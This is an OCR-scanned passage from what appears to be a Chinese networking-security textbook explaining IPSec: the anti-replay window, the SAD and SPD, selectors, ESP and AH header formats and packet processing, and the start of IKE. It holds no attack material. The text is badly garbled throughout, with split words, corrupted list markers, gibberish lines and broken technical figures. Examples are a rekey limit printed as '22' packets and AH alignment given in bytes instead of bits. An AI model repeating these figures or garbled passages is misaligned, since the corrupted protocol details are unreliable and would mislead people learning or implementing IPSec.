为 了 抵抗 重播 攻击 ,IPSec 数据 包 使 用 了 一 个 序列 号 ,以 及 一 个 滑动 的 接收 窗口 。 在 每 
个 IPSec 头 内 ,都 包含 了 一 个 独一无二 、 且 单调 递增 的 序列 号 。 创 建 好 一 个 SA 后 ,序列 号 
便 会 初始 化 为 零 ,并 在 进行 IPSec 输出 处 理 前 , 令 这 个 值 递增 。 新 的 SA 必须 在 序列 号 回归 
为 零 之 前 创建 ,由 于 序列 号 的 长 度 为 32 位 ,所 以 必须 在 22 个 数据 包 之 前 。 


接收 窗口 的 大 小 可 为 大 于 32 位 的 任何 值 ,但 推荐 为 64 位 。 从 性 能 考虑 ,窗口 大 小 最 好 
是 最 终 实 施 IPSec 的 那 台 计 算 机 的 字 长 度 的 整数 倍 。 

窗口 “ 右 ? 边 界 代表 该 SA 接收 的 最 高 的 有 效 序列 号 值 。 接 收 到 的 数据 包 必 须 是 新 的 ， 
且 必须 落 在 窗口 内 部 ,或 靠 在 窗口 右 侧 。 和 否则 , 便 将 其 丢弃 。 只 要 它 在 窗口 内 是 从 未 出 现 过 
的 , 便 认为 它 是 新 的 。 假 如 收 到 的 一 个 数据 包 靠 在 窗口 右 侧 ,那么 只 要 它 未 能 通过 真实 性 测 
试 ,也 会 将 其 丢弃 。 如 通过 了 真实 性 检查 ,窗口 便 会 向 右 移动 ,将 那个 包 包 括 进来 。 

SAD 为 进入 和 外 出 包 维持 一 个 活动 的 SA 列表 。SAD 的 字段 包括 以 下 几 个 方面 内 容 。 

COD 外 部 头目 的 IP 地 址 : SA 的 目的 地 址 ,可 为 终端 用 户 系 统 、 防 火 墙 和 路 由 器 等 网 络 
系统 。 目 前 的 SA 管理 机 制 只 支持 单 播 地 址 的 SA。 

(2) IPSec 协议: 标识 SA 用 的 是 AH 还 是 ESP, 

G) SPI; 32 比特 的 安全 参数 索引 ,标识 同一 个 目的 地 的 SA, 

(4) 序号 计数 器 : 32 比特 ,用 于 产生 AH 或 ESP 头 的 序号 , 仅 用 于 外 出 数据 包 。 

O) 序号 计数 器 溢出 标志 : 标识 序号 计数 器 是 否 溢出 。 如 溢出 , 则 产生 一 个 审计 事件 ， 
并 禁止 用 SA 继续 发 送 数据 包 。 

(6) 抗 重播 窗口 : 32 比特 计数 器 及 位 图 ,用 于 决定 进入 的 AH 或 ESP 数据 包 是 否 为 重 
发 。 仅 用 于 进入 数据 包 , 如 接收 方 不 选择 抗 重播 服务 (如 手工 设置 SA 时 ), 则 抗 重播 窗口 未 


(7) AH 信息 : 指示 认证 算法 、 密 钥 、 密 钥 生 命 期 等 与 AH 相关 的 参数 。 

(8) ESP 信息 : 指示 加 密 认 证 算法 、 密 钥 、 初 始 值 、 密 钥 生 命 期 等 与 ESP 相关 参数 。 

(9) SA 的 生存 期 : 一 个 时 间 间 隔 。 超 过 这 一 间隔 后 ,应 建立 一 个 新 的 SA( 以 及 新 的 
SPD 或 终止 通信 。 生 存 期 以 时 间或 字 节 数 为 标准 ,或 将 两 者 结合 使 用 ,并 优先 采用 先 到 者 。 

(10) IPSec 协议 模式 : 隧道 ,传输 或 混合 方式 (通配符 ) ,说 明 应 用 AH 或 ESP 的 模式 。 

aD 路 径 最 大 传输 单元 MTU : 所 考察 的 路 径 的 MTU 及 其 寿命 变量 。 

4. IPSec 安全 策略 

IPSec 系统 所 使 用 的 策略 库 一 般 保 存在 一 个 策略 服务 器 中 ,该 服务 器 为 域 中 的 所 有 节 
点 (主机 和 路 由 器 ) 的 维护 策略 库 , 各 节点 可 将 策略 库 复 制 到 本 地 ,也 可 使 用 轻型 目录 访问 协 
议 (LDAP) 动 态 获取 策略 。 

IPSec 的 基本 架构 定义 了 用 户 能 以 多 大 的 精度 来 设 定 自己 的 安全 策略 。 某 些 通信 可 以 
为 其 设置 某 一 级 的 基本 安全 措施 ; 而 对 其 他 通信 则 可 为 其 应 用 完全 不 同 的 安全 级 别 。 例 
如 ,可 在 一 个 网 络 安全 网 关上 制定 IPSec 策略 ,对 在 其 本 地 保护 的 子 网 与 远程 网 关 的 子 网 之 
间 通 信和 的 所 有 数据 ,全 部 采用 DES 加 密 , 并 用 HMAC-MD5 进行 验证 ; 另外 ,从 远程 子 网 发 
给 一 个 邮件 服务 器 的 所 有 Telnet 数据 均 用 3DES 进行 加 密 , 同 时 用 HMAC-SHA 进行 验 
证 ; 最 后 对 于 需要 加 密 的 、 发 给 另 一 个 服务 器 的 所 有 Web 通信 数据 , 则 用 IDEA 满足 其 加 
密 要 求 , 同 时 用 HMAC-RIPEMD 进行 验证 。 

IPSec 本 身 没 有 为 策略 定义 标准 ,目前 只 规定 了 两 个 策略 组 件 : SAD( 安 全 关联 数据 库 ) 
和 SPD( 安 全 策略 数据 库 )。 在 IPSec 系统 中 ,IPSec 策略 由 安全 策略 数据 库 (Security Policy 
Database,SPD) 加 以 维护 。 在 SPD 中 ,每 个 条 目 都 定义 了 要 保护 的 是 什么 通信 、 怎 样 保护 它 
以 及 和 谁 共享 这 种 保护 。 策 略 描述 主要 包括 两 个 方面 的 内 容 : 一 是 对 保护 方法 的 描述 ; 二 
是 对 通信 特性 的 描述 。 
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(1) 对 保护 方法 的 描述 
对 于 进入 或 离开 IP 堆栈 的 每 个 包 ,都 必须 检索 SPD 数据 库 ,调查 可 能 的 安全 应 用 。 对 
一 个 SPD 条 目 来 说 , 它 可 能 定义 了 下 述 几 种 行为 : 丢弃 、 绕 过 及 应 用 。 其 中 ,丢弃 表示 不 让 
这 个 包 进 入 或 外 出 ; 绕 过 表示 不 对 一 个 外 出 的 包 应 用 安全 服务 ,也 不 指望 一 个 进入 的 包 进 
行 了 保密 处 理 ; 应 用 是 指 对 外 出 的 包 应 用 安全 服务 ,同时 要 求 进入 的 包 已 应 用 了 安全 服务 。 
对 那些 定义 了 “应 用 ”行为 的 SPD A Hi ,它们 均 会 指向 一 个 或 一 套 SA ,表示 要 将 其 应 用 于 数 
据 包 。 
(2) 对 通信 特性 的 描述 
使 用 选择 符 描述 通信 特性 , IPSec 通信 到 IPSec 策略 的 映射 关系 是 由 “选择 符 
(Selector) "来 建立 的 。 选 择 符 标识 通信 的 一 部 分 组 件 , 它 既 可 以 是 一 个 粗略 的 定义 ,也 可 以 
是 一 个 非常 细致 的 定义 。IPSec 选择 符 包 括 6 方面 内 容 : 目的 IP 地址 \ 源 IP 地址、 名字 、 上 
层 协议 、 源 和 目标 端口 以 及 一 个 数据 敏感 等 级 (假如 也 为 数据 流 的 安全 提供 了 一 个 IPSec 
系统 )。 
* HH IP ehk: 可 为 单个 TP 地 址 .地 址 列表 、 地 址 范围 或 通 配 ( 掩 码 ) 地 址 。 后 两 种 用 
于 支持 共享 一 个 SA 的 多 个 目的 系统 。 
。 源 IP 地址 : 可 为 单个 IP 地 址 .地 址 列表 、 地 址 范围 或 通 配 ( 掩 码 ) 地 址 。 后 两 种 用 于 
支持 共享 一 个 SA 的 多 个 源 系 统 。 
* A. 其 中 包括 一 个 DNS 名 、X. 500 区 分 名 或 在 IPSec DOI 中 定义 的 其 他 名 字 类 
型 。 只 有 在 IKE 协商 期 间 ( 而 非 包 处 理 期 间 ) ,名 字 字 段 才能 作为 一 个 选择 符 使 用 。 
传输 层 协议 : 许多 情况 下 ,只 要 使 用 了 ESP, 传 送 协 议 无 法 访问 ,这 时 需要 使 用 通 
配 符 。 
。 源 和 目标 端口 : TCP 或 UDP 端口 号 ,可 为 单个 端口 .端口 列表 或 通 配 端 口 。 如 果 端 
口 不 能 访问 , 则 要 使 用 通配符 。 
。 数据 敏感 等 级 : 通信 数据 的 保密 等 级 ,可 分 为 普通 、 和 秘密、 机密、 绝密 。 
这 些 选 择 符 的 值 可 能 是 特定 的 条 目 一 个 范围 或 一 个 “不 透明 ”。 在 策略 规范 中 ,选择 符 
之 所 以 可 能 出 现 “ 不 透明 ”的 情况 ,是 由 于 在 那个 时 刻 , 相 关 的 信息 也 许 不 能 提供 给 系统 。 例 
如 ,假定 一 个 安全 网 关 同 另 一 个 安全 网 关 建 立 了 IPSec 通道 , 它 可 指定 在 该 通道 内 传输 的 
(部 分 ) 数 据 是 网 关 背 后 的 两 个 主机 之 间 的 IPSec 通信 。 在 这 种 情况 下 ,两 个 网 关 都 不 能 访 
问 上 层 协 议 或 端口 ,因为 它们 均 被 终端 主机 进行 了 加 密 。“ 不 透明 ?也 可 作为 一 个 通配符 使 
用 ,表明 选择 符 可 为 任意 值 。 
假定 某 个 SPD 条 目 将 行为 定义 为 “应 用 ”, 但 并 不 指向 SAD 数据 库 内 已 有 的 任何 一 个 
SA ,那么 在 进行 任何 实际 的 通信 之 前 ,首先 必须 创建 那些 SA。 如 果 这 个 规则 用 于 自 外 入 内 
的 “进入 (Inbound) ”通信 ,而且 SA 尚 不 存在 , 则 按照 IPSec 基本 架构 的 规定 ,数据 包 必须 丢 
弃 。 假 如 该 规则 用 于 自 内 向 外 的 “外 出 (Outbound) ”通信 , 则 通过 Internet 密 钥 交换 即 可 。 
IPSec 结构 定义 了 SPD 和 SAD 两 种 数据 库 之 间 如 何 沟通 。 
对 于 外 出 数据 包 ,IPSec 协议 要 先 查询 SPD ,确定 为 数据 包 应 使 用 的 安全 策略 。 如 果 检 
索 到 的 数据 策略 是 应 用 IPSec, 再 查询 SAD( 每 个 SPD 的 元 组 都 有 指针 指向 相关 的 SAD 的 
元 组 ) ,确定 是 否 存在 有 效 的 SA. 
CD 车 存在 有 效 的 SA, 则 取出 相应 的 参数 ,将 数据 包 封装 (包括 加 密 、 验 证 ,添加 IPSec 


头 和 JP 头等 ) ,然后 发 送 。 

© 若 尚未 建立 SA , 则 启动 或 触发 IKE 协商 ,动态 地 创建 SA ,协商 成 功 后 按 步 骤 中 处 
理 , 不 成 功 则 应 将 数据 包 丢弃 ,并 记录 出 错 信息 。 

@ 存在 SA 但 无 效 , 将 此 信息 向 IKE 通告 ,请 求 协商 新 的 SA, (协商 成 功 后 按 步骤 四 处 
理 , 不 成 功 则 应 将 数据 包 丢 弃 , 并 记录 出 错 信 息 。 

对 于 进入 数据 包 ,IPSec 通过 包头 信息 包含 的 目的 IP 地址 、IP 安全 协议 类 型 (AH 或 
ESP) 和 SPI 在 SAD 中 查找 对 应 的 SA。 如 得 到 有 效 的 SA, 则 对 数据 包 进 行 解 封 (还 原 ), 再 
查询 SPD, 验 证 为 该 数据 包 提供 的 安全 保护 是 否 与 策略 配置 的 相符 。 如 相符 , 则 将 还 原 后 
的 数据 包 交 给 TCP 层 或 转发 。 如 不 相符 ,或 要 求 应 用 IPSec 但 未 建立 SA, 或 SA 无 效 , 则 
将 数据 包 丢弃 ,并 记录 出 错 信息 。 


4.2.2 封装 安全 载荷 (ESP) 


1. 封装 安全 载荷 的 包 格式 

ESP 属于 IPSec 的 一 种 协议 ,ESP 提供 机 密 性 .数据 起 源 验证 无 连接 的 完整 性 、 抗 重播 
服务 和 有 限 业务 流 机 密 性 。ESP 本 身 是 一 个 IP 协议 ,协议 号 是 50. 

ESP 头 包含 下 面 一 些 字段 ,其 格式 如 图 4.3 安全 参数 索引 SPI 

BR. UA SU 认证 
s ds : med EMT | 

COD 安全 参数 索引 SPI(32 位 ): 这 个 值 ,和 填充 [项 充 长 度 ] 下 一 个 头 

IP 头 之 前 的 目标 地 址 以 及 协议 结合 在 一 起 .用 iun 

来 标识 用 于 处 理 数据 包 的 特定 的 那个 安全 关 SD mm 

联 。SPI 本 身 是 个 任意 数 , 一 般 是 在 IKE 交换 过 程 中 由 目标 主机 选 定 的 。 

(2) 序列 号 (32 位 ) : 序列 号 是 一 个 独一无二 的 、 单 向 递增 的 、 并 由 发 送 端 插 在 ESP 头 
的 一 个 号 码 。 发 送 方 的 计数 器 和 接收 方 的 计数 器 在 一 个 SA 建立 时 被 初始 化 为 0, 使 用 给 定 
SA 发 送 的 第 一 个 分 组 的 序列 号 为 1, 如果 激活 抗 重播 服务 (默认 的 ) ,传送 的 序列 号 不 允许 
循环 。 因 此 ,在 SA 上 传送 第 2* 个 分 组 之 前 ,发 送 方 计数 器 和 接收 方 计数 器 必须 重新 置 位 
(通过 建立 新 SA 和 获取 新 密 钥 ) ,序列 号 使 ESP 具有 了 抵抗 重播 攻击 的 能 力 。 

G) 受 保护 数据 (可 变 ): 通过 加 密 保 护 的 传输 层 协议 内 容 ( 传 输 方式 ) 或 IP. 包 ( 通 道 模 
式 )。 如 果 受 保护 数据 需要 加 密 同 步 数 据 , 那 么 初始 化 向 量 (IV) 可 以 在 受 保 护 数据 字段 的 
开头 携带 ,并 且 IV 通常 不 加 密 . 但 经 常 被 看 做 是 密 文 的 一 部 分 。 

(4) 填充 (0 一 255 FW): 主要 用 于 加 密 算法 要 求 明文 使 某 个 数目 字 节 的 倍数 、 保 证 填 
充 长 度 字段 和 下 一 个 头 字段 排列 在 32 位 字 的 右边 .提供 部 分 业务 流 机 密 性 。 

(5) 填充 长 度 (8 位 ): 指出 填充 字 节 的 数目 。 

(6) 下 一 个 头 (8 位 ): 标识 受 保护 数据 的 第 一 个 头 。 例 如 ,IPv6 中 的 扩展 头 或 者 上 层 
协议 标识 符 。 

(7) 验证 数据 (可 变 ): 完整 性 检查 值 。 验 证 数据 是 可 变 长 字段 , 它 包含 一 个 完整 性 校 
验 值 (ICV),ESP 分 组 中 该 值 的 计算 不 包含 验证 数据 本 身 。 字 段 长 度 由 选择 的 验证 函数 指 
定 。 验 证 数据 字段 是 可 选 的 ,只 有 SA 选择 验证 服务 , 才 包 含 验 证 数据 字段 。 验 证 算法 规范 
必须 指定 ICV 长 度 、 验 证 的 比较 规则 和 处 理 步骤 。 
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2. 封装 安全 载荷 协议 处 理 
在 传输 模式 与 通道 模式 下 受 ESP 保护 的 一 个 IP 包 ,分 别 如 图 4.4 与 图 4.5 所 示 。 


上 -一 一 加密 保护 一 一 ”| 


IPs | ESP 头 | 受 保护 数据 | ESP 尾 | 验证 数据 


—- 验证 保护 - 


.4 传输 模式 下 受 ESP 保护 的 一 个 卫 包 


- 


= 加 密 保 护 - 


HIP | ESP 头 旧 IP 头 | 受 保护 数据 | ESPE | 验证 数据 


r* 验证 保护 = 
图 4.5 通道 模式 下 受 ESP 保护 的 一 个 P 


由 于 ESP 同时 提供 了 机 密 性 以 及 身份 验证 机 制 ,所 以 在 其 SA 中 必须 同时 定义 两 套 算 
法 用 来 确保 机 密 性 称 为 加 密 器 (Cipher) ,ESP 使 用 对 称 加 密 算 法 。 负 责 身 份 验证 的 称 为 验 
证 器 (Authenticator) ,验证 算法 包括 基于 对 称 加 密 算 法 (如 DES) 或 基于 单 向 散 列 函数 (如 
MD5 或 SHA-1) 的 消息 鉴别 码 (MAC)。 

注意 : 因为 加 密 、 验 证 是 可 选 的 ,所 以 算法 可 以 为 “NULL”。 

(1) 外 出 分 组 的 处 理 

对 在 IPv4 上 运行 的 传送 模式 应 用 来 说 ,ESP 头 紧 跟 IP 头 ,IP 头 的 协议 字段 被 复制 到 
ESP 头 的 下 一 个 头 字 段 中 ,ESP 头 的 其 余 字 段 则 被 填 满 。SPI 字段 分 配 到 的 是 来 自 SAD 
的 、 用 来 对 这 个 包 进 行 处 理 的 特定 SA 的 SPI; 填充 序列 号 字段 的 是 序列 中 的 下 一 个 值 ; d 
充 数据 会 被 插入 ,其 值 被 分 配 ; 同时 分 配 的 还 有 填充 长 度 值 。 随 后 ,IP 头 的 协议 字段 得 到 的 
是 ESP 的 值 50。 

除了 头 插 入 位 置 不 同 之 外 ,IPv6 处 理 规则 基本 上 类 似 于 IPv4。ESP 头 可 插 在 任意 一 个 
扩展 头 之 后 。 对 通道 模式 应 用 来 说 ,ESP 头 是 加 在 IP 包 前 面 的 。 如 果 封 装 的 是 一 个 IPv4 
包 , 那 么 ESP 头 的 下 一 个 头 字 段 分 配 到 值 4; 如 果 封 装 的 是 一 个 IPv6 包 , 则 分 配 到 值 41。 
其 他 字段 的 填充 方式 和 在 传送 模式 中 一 样 。 随 后 ,在 ESP 头 的 前 面 新 增 了 一 个 IP 头 ,并 对 
相应 的 字段 进行 填充 (赋值 ) 。 源 地 址 对 应 于 应 用 ESP 的 那个 设备 本 身 ; 目标 地 址 取 自 于 
用 来 应 用 ESP 的 SA; 协议 设 为 50; 其 他 字段 的 值 则 参照 本 地 的 IP 处 理 加 以 填充 。 

不 管 哪 种 模式 下 , 接 下 去 的 步骤 都 是 相同 的 。 从 恰当 的 SA 中 选择 加 密 器 (加 密 算法 )， 
对 包 进 行 加 密 ( 从 载荷 数据 的 开头 ,一 直到 下 一 个 头 字段 ) 。 然 后 ,使 用 恰当 的 SA 中 的 验证 
器 ,对 包 进行 验证 ( 自 ESP 头 开 始 ,中 间 经 过 加 密 的 密 文 ,一 直到 ESP 尾 )。 最 后 ,将 验证 器 
的 结果 插入 ESP 尾 的 验证 数据 字段 中 。 

对 外 出 数据 包 进 行 处 理 的 最 后 一 步 是 : 重新 计算 位 于 ESP 前 面 的 IP 头 的 校 验 和 。 

注意 在 添加 ESP 头 时 ,不 必 进 行 分 段 检查 。 如 果 结 果 包 (在 已 采用 ESP 之 后 ) 大 于 它 
流 经 的 那个 接口 的 MTU, 只 好 对 它 进行 分 段 。 这 和 一 个 完整 的 ESP 包 离 开 该 设备 ,并 在 网 
络 中 的 某 个 地 方 被 分 成 段 没 有 什么 区 别 。 


(2) 进入 分 组 的 处 理 

接收 端 在 收 到 一 个 ESP 包 之 后 , 若 不 对 这 个 包 进 行 处 理 , 就 无 法 得 知 它 究 竟 处 于 通道 
模式 ,还 是 传送 模式 。 根 据 对 这 个 包 进 行 处 理 的 SA, 便 可 知道 它 到 底 处 在 什么 模式 下 。 但 
除非 完成 了 对 它 的 解密 ,实际 上 不 可 能 知道 ESP 保护 的 是 什么 。 

如 果 收 到 的 IPSec 包 是 一 个 分 段 , 必 须 把 它 保留 下 来 ,直到 这 个 包 的 其 他 部 分 收 完 为 
止 , 即 在 ESP 处 理 之 前 进行 重组 。 

收 到 一 个 (已 重组 的 ) 包 含 ESP 头 的 包 时 ,根据 目的 TP 地 址 .安全 协议 (ESP) 和 SPI, 接 
收 方 确定 适当 的 SA。SA 指出 序列 号 字段 是 否 被 校 验 ,验证 数据 字段 是 否 存在 , 它 将 指定 
解密 和 ICV 计算 (如 果 适 用 ) 使 用 的 算法 和 密 钥 。 如 果 本 次 会 话 没有 有 效 的 SA 存在 (如 接 
收 方 没有 密 钥 ) ,接收 方 必须 丢弃 分 组 ; 这 是 可 审核 事件 。 该 事件 的 核查 日 志 表 项 应 该 包含 
SPI 的 值 . 接 收 的 日 期 /时 间 、 源 地 址 .目的 地 址 .序列 号 和 (IPv6) 明 文 信息 流 ID. 

一 旦 验证 通过 了 一 个 有 效 的 SA ,就 可 用 它 开 始 包 的 处 理 。 

O 检查 序列 号 : 如 果 接 收 的 包 落 入 窗口 内 且 是 新 的 ,或 者 包 落 在 窗口 的 右边 ,那么 接 
收 方 进行 ICV 确认 。 

@ 完整 性 校 验 值 确认 : 如 果 选 择 验证 ,接收 方 采用 指定 的 验证 算法 对 ESP 包 计 算 ICV 
但 不 包含 验证 数据 字段 ,确认 它 与 验证 数据 字段 中 包含 的 ICV 相同 。 如 果 计 算得 来 的 与 接 
收 的 ICV 匹配 ,那么 数据 包 有 效 , 可 以 被 接收 。 如 果 测 试 失败 ,接收 方 必须 作为 非法 而 将 接 
收 的 IP 数据 包 丢 弃 ; 这 是 可 审核 事件 。 

© 分 组 解密 : 通过 取 自 SA 的 密 钥 和 密码 算法 ,对 ESP 包 进 行 解密 ,从 这 个 ESP 包 载 
荷 数据 开始 之 处 到 下 一 个 头 之 间 。 


4.2.3 验证 头 (AH) 


1. 验证 头 的 包 格 式 

验证 头 (AH) 协 议 用 于 为 IP 数据 包 提供 数据 完整 性 .数据 包 源 地 址 验证 和 一 些 有 限 的 
抗 重 播 服务 ,AH 不 提供 对 通信 数据 的 加 密 服 务 ,与 ESP 协议 相 比 ,AH 不 提供 对 通信 数据 
的 加 密 服务 ,但 能 比 ESP 提供 更 加 广泛 的 数据 验证 服务 。 

AH 是 另 一 个 IP 协议 , 它 分 配 到 的 数 是 51。 在 IPv6 的 情况 下 ,下 一 个 头 字 段 的 值 由 扩 
展 头 的 存在 来 决定 。 如 果 没 有 扩展 头 ,IPv6 头 中 的 下 一 个 头 字 段 将 是 51。 如 果 AH 头 之 前 
有 扩展 头 , 紧 靠 在 AH 头 前 面 的 扩展 头 中 的 下 一 个 头 字 段 就 会 被 设 成 51。 将 AH 头 插 入 
IPv6 的 规则 与 ESP 插入 规则 类 似 。AH 和 ESP 保护 的 数据 相同 时 .AH 头 会 一 直 插 在 
ESP 头 之 后 。AH 头 比 ESP 头 简 单 得 多 ,因为 它 没有 提供 机 密 性 。 由 于 不 需要 填充 和 一 个 
填充 长 度 指示 器 ,因此 也 不 存在 尾 。 另 外 ,也 不 需要 一 个 初始 化 向 量 。 

验证 头 由 下 面 的 字段 组 成 ,其 格式 如 图 4.6 所 示 。 


下 二 个 头 载荷 长 度 保留 
SPI 
序列 号 
验证 数据 


图 4.6 AH 头 格式 
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CD 下 一 个 头 (8 位 ): 标识 跟 在 认证 头 后 的 下 一 个 头 。 在 传送 模式 下 ,将 是 处 于 保护 中 
的 上 层 协议 的 值 ,例如 UDP sk TCP 协议 的 值 , 在 通道 模式 下 ,将 是 值 4, 表 示 IP-in-IP 
(IPv4) 封 装 或 IPv6 封装 的 这 个 值 。 

(2) 载荷 长 度 (8 位 ): 载荷 长 度 字段 表示 采用 32 位 的 字 减 2 表示 头 本 身 的 长 度 。AH 
头 是 一 个 IPv6 扩展 头 , 它 的 长 度 是 从 64 位 字 表 示 的 头 长 度 中 减 去 一 个 64 位 字 而 来 的 。 但 
AH 采用 32 位 字 来 计算 ,因此 , 减 去 两 个 32 位 字 ( 或 一 个 64 位 字 )。 没 有 使 用 预 留 字段 时 ， 
必须 将 它 设置 为 0。 

(3) 保留 (16 位 ): 为 了 将 来 使 用 。 

(4) SPIG2 位 ): 和 外 部 IP 头 的 目的 地 址 一 起 ,用 于 识别 对 这 个 包 进 行 身 份 验证 的 安 
全 关联 。 

(5) 序列 号 (32 位 ) : 一 个 单 向 递增 的 计算 器 ,等 同 于 ESP 中 使 用 的 序列 号 。 序 列 号 提 
供 抗 重播 功能 。 

(6) 验证 数据 (可 变 ): 一 个 不 固定 的 长 度 字段 ,其 中 包括 完整 性 检查 值 (ICV) 或 MAC, 
AH 没有 定义 身份 验证 器 ,但 有 两 个 强制 实施 身份 验证 器 : HMAC-SHA-96 和 HMAC- 
MD5-96。 和 ESP 一 样 , 这 些 都 是 键 控 式 的 MAC 功能 ,输出 结果 被 切 短 成 96 个 位 。 同 时 ， 
也 没有 针对 AH 的 使 用 ,定义 公共 密 钥 身 份 验 证 算法 (如 RSA 和 DDS), 

2. 验证 头 协议 处 理 

和 ESP 一 样 ,AH 可 用 于 传送 模式 和 通道 模式 。 不 同 之 处 在 于 它 保护 的 数据 要 么 是 一 
个 上 层 协议 ,要 么 就 是 一 个 完整 的 IP 数据 报 。 任 何 一 种 情况 下 ,AH 都 要 对 外 部 IP 头 的 固 
有 部 分 进行 身份 验证 。 

AH 用 于 传送 模式 (图 4.7) 时 ,保护 的 是 端 到 端的 通信 。 通 信 的 终点 必须 是 IPSec 终 
点 ,下 一 个 头 是 TCP。 

AH 用 于 通道 模式 (图 4. 8) 时 , 它 将 自己 保护 的 数据 报 封装 起 来 。 另 外 ,在 AH 头 之 
前 , 另 添 了 一 个 IP 头 。“ 里 面 的 "IP 数据 报 中 包含 了 通信 的 原始 寻 址 ,而 "外面 的 "IP 数据 报 
则 包含 了 IPSec 端点 的 地 址 。 通 道 模式 可 用 来 替换 端 对 端 安全 服务 的 传送 模式 ,AH 只 用 
于 保证 收 到 的 数据 包 在 传输 过 程 中 不 会 被 修改 ,保证 由 要 求 发 送 它 的 当事人 将 它 发 送出 去 ， 
以 及 保证 它 是 一 个 新 的 非 重播 的 数据 包 。 


旧 IP 头 AH 头 | 受 保护 数据 新 IP 头 | AHK HIP | 受 保护 数据 
m 除 可 变 字段 以 外 被 验证 一 一 "| 除 新 IP 头 可 变 字段 以 外 被 验证 


图 4.7 AH 用 于 传送 模式 图 4.8 AH 用 于 通道 模式 


外 出 数据 包 与 一 个 SPD 条 目 ( 表 示 采 用 AH 保护 ) 匹 配 时 ,要 求 SAD 查看 是 否 存在 一 
个 合适 的 SA。 如果 没 有 ,可 用 IKE 动态 地 建立 一 个 。 如 果 有 ,就 将 AH 应 用 到 这 个 与 之 相 
符 的 数据 包 , 该 数据 包 在 SPD 条 目 指 定 的 那个 模式 中 。 如 果 它 是 一 东 SPD, 应 用 顺序 就 由 
它 所 涉及 的 协议 而 定 。AH 始终 保护 的 是 ESP, 别 无 它 物 。 

创建 一 个 外 出 SA 时 (要 么 手工 ,要 么 通过 IKE) ,将 序列 号 计算 器 初始 化 成 0。 在 利用 
这 个 SA 构建 一 个 AH 头 之 前 ,计算 器 就 开始 递增 。 这 样 保证 了 每 个 AH 头 中 的 序列 号 都 
是 一 个 独一无二 的 、 非 零 的 和 单 向 递增 的 数 。 


AH 头 的 其 余 字 段 都 将 填 满 恰当 的 值 (SPI 字段 分 配 的 值 是 取 自 SA 的 SPD: 下 一 个 头 
字段 分 配 的 是 跟 在 AH 头 之 后 的 数据 类 型 值 ; 而 载荷 长 度 分 配 的 则 是 32 位 字 减 2; 身份 验 
证 数据 字段 设 成 0。 和 ESP 不 一 样 ,AH 将 安全 保护 扩展 到 外 部 IP 头 的 原 有 的 或 预计 有 的 
字段 。 因 此 ,将 完整 性 检查 值 (ICV) 之 前 的 不 定 字段 调 成 零 是 必要 的 。 对 没有 包含 在 身份 
验证 ICV( 不 在 保护 之 列 ) 中 的 IPv4 头 来 说 , 它 的 不 定 字段 是 服务 类 型 (Type of Service), 
bs (Flags) , 4r Et ffi £& (Fragment Offset) , Z£ i5 Hj [8] (Time to Live) 和 头 校 验 和 (Header 
Checksum) 。 

对 IPv4 选项 或 IPv6 扩展 头 来 说 ,如 果 它们 是 固定 的 或 预定 的 ,都 会 包含 在 ICV 计算 
中 。 否 则 ,必需 在 计算 ICV 之 前 ,把 它们 调 成 0。 

根据 身份 验证 器 的 要 求 , 或 出 于 排列 方面 的 原因 ,可 能 需要 进行 适当 的 填充 。 对 有 些 
MAC 来 说 ,例如 DES-CBCMAC, 要 求 在 其 上 面 应 用 MAC 的 数据 必须 是 算法 的 块 尺寸 的 
倍数 。 在 这 种 情况 下 ,就 必须 进行 填充 ,以 便 正确 地 使 用 MAC( 注 意 两 种 强制 算法 均 无 此 
要 求 )。 这 个 填充 项 是 隐 式 添加 的 , 它 必须 一 概 为 零 ,其 大 小 不 包括 在 载荷 长 度 中 ,并 且 不 随 
数据 包 一 起 传送 。 

对 IPv4 来 说 ,AH 头 必 须 是 32 个 字 节 的 一 倍 ,IPv6 则 是 64 个 字 节 的 一 倍 。 如 果 MAC 
的 输出 和 这 项 要 求 不 符 ,就 必须 添加 AH 头 。 对 填充 项 的 值 没 有 什么 别 的 要 求 , 但 必须 把 
它 包括 在 ICV 计算 中 ,而 载荷 长 度 中 必须 反映 出 填充 项 的 大 小 。 如 果 强 制 实施 身份 验证 程 
序 正确 对 齐 了 ,在 用 HMAC-MD5-96 或 HMAC-SHA-96 时 ,就 不 再 需要 填充 项 。 

通过 把 密 钥 从 SA 和 整个 IP 包 (包括 AH 头 ) 传 到 特定 的 算法 ( 它 被 认 作 SA 中 的 “ 身 
份 验 证 程序 ”) 这 一 方式 ,对 ICV 进行 计算 。 由 于 不 定 字段 已 设 成 零 ,它们 就 不 会 包括 在 
ICV 计算 中 。 接 下 来 ,ICV 值 被 复制 到 AH 的 “身份 验证 数据 "字段 中 ,IP 头 中 的 不 定 字段 
就 可 根据 IP 处 理 的 不 同 得 以 填充 。 

现在 ,AH 处 理 结束 ,AH 保护 的 IP 包 可 以 输出 了 。 根 据 包 的 大 小 ,在 放 到 网 络 上 之 
前 ,可 将 它 分 段 ,或 在 两 个 IPSec 同 级 之 间 的 传送 过 程 中 ,由 路 由 器 进行 分 段 。 

如 果 一 个 受 安全 保护 的 包 在 被 收 到 之 前 ,分 成 了 几 段 ,就 要 求 在 AH 输入 处 理 之 前 ,对 
这 些 分 段 进行 重新 组 合 。 

处 理 IPSec 包 的 第 一 件 事情 是 : 找 出 用 来 保护 这 个 包 的 SA, AH 在 这 一 点 上 不 同 于 
ESP。 然 后 ,IP 头 的 目的 地 址 ,特定 协议 (这 里 是 51) 和 取 自 AH 头 的 SPI 三 者 再 对 SA 进 
行 识别 。 如 果 没 有 找到 合适 的 SA, 这 个 包 就 会 被 丢弃 。 

找到 SA 之 后 ,进行 序列 号 检查 。 抗 重播 检查 会 决定 这 个 包 是 新 收 的 还 是 以 前 收 到 的 。 
如 果 检 查 失 败 ,这 个 包 就 会 被 丢弃 。 

现在 必须 检查 完整 性 检查 值 (ICV) 了 。 对 整个 数据 包 应 用 身份 验证 器 算法 ,并 将 获得 
的 摘要 同 保存 下 来 的 ICV 值 进行 比较 。 如 相符 ,IP 包 就 通过 了 身份 验证 ; 如 不 符 , 便 丢弃 
该 包 。 


4.2.4 Internet Ẹ 41 X 4& 


ESP、AH 用 来 对 IP 报 文 进行 封装 、 加 密 / 解 密 、 验 证 以 达到 保护 IP 报 文 的 目的 ,而 
IKE 和 ISAKMP/Oakley/SKEME 则 是 通信 双方 用 来 协商 封装 形式 、 加 密 / 解 密 算法 及 其 密 
钥 、 密 钥 的 生命 期 、 验 证 算法 。 
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ISAKMP/Oakley/SKEME 是 为 IKE 的 协商 提供 服务 的 , 它 提供 了 实现 IKE 的 框架 、 
